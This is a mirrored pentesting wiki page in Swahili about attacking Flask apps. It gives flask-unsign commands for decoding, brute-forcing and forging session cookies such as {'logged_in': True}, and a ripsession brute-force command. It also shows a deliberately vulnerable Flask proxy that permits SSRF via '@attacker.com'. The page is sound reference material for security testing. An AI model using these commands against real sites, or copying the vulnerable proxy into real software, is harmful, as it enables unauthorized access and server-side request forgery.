maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-web/flask.md

2.5 KiB
Raw Blame History

Flask

{{#include ../../banners/hacktricks-training.md}}

Labda ikiwa unacheza CTF, programu ya Flask itahusishwa na SSTI.

Cookies

Jina la kikao cha kuki la default ni session.

Decoder

Decoder ya kuki za Flask mtandaoni: https://www.kirsle.net/wizards/flask-session.cgi

Manual

Pata sehemu ya kwanza ya kuki hadi nukta ya kwanza na uifanye Base64 decode>

echo "ImhlbGxvIg" | base64 -d

Keki pia imesainiwa kwa kutumia nenosiri

Flask-Unsign

Zana ya mstari wa amri ya kupata, kufungua, kujaribu nguvu na kuunda keki za kikao za programu ya Flask kwa kukisia funguo za siri.

{{#ref}} https://pypi.org/project/flask-unsign/ {{#endref}}

pip3 install flask-unsign

Fasiri Keki

flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'

Brute Force

flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval

Kusaini

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'

Kusaini kwa kutumia toleo la zamani (legacy)

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy

RIPsession

Zana ya mistari ya amri ya kulazimisha tovuti kwa kutumia vidakuzi vilivyoundwa na flask-unsign.

{{#ref}} https://github.com/Tagvi/ripsession {{#endref}}

ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt

SQLi katika kuki ya kikao cha Flask na SQLmap

Mfano huu unatumia chaguo la sqlmap eval ili kusaini kiotomatiki mzigo wa sqlmap kwa flask kwa kutumia siri inayojulikana.

Proxy ya Flask kwa SSRF

Katika andiko hili inaelezwa jinsi Flask inavyoruhusu ombi lianze na herufi "@":

GET @/ HTTP/1.1
Host: target.com
Connection: close

Katika hali ifuatayo:

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)

Inaweza kuruhusu kuanzisha kitu kama "@attacker.com" ili kusababisha SSRF.

{{#include ../../banners/hacktricks-training.md}}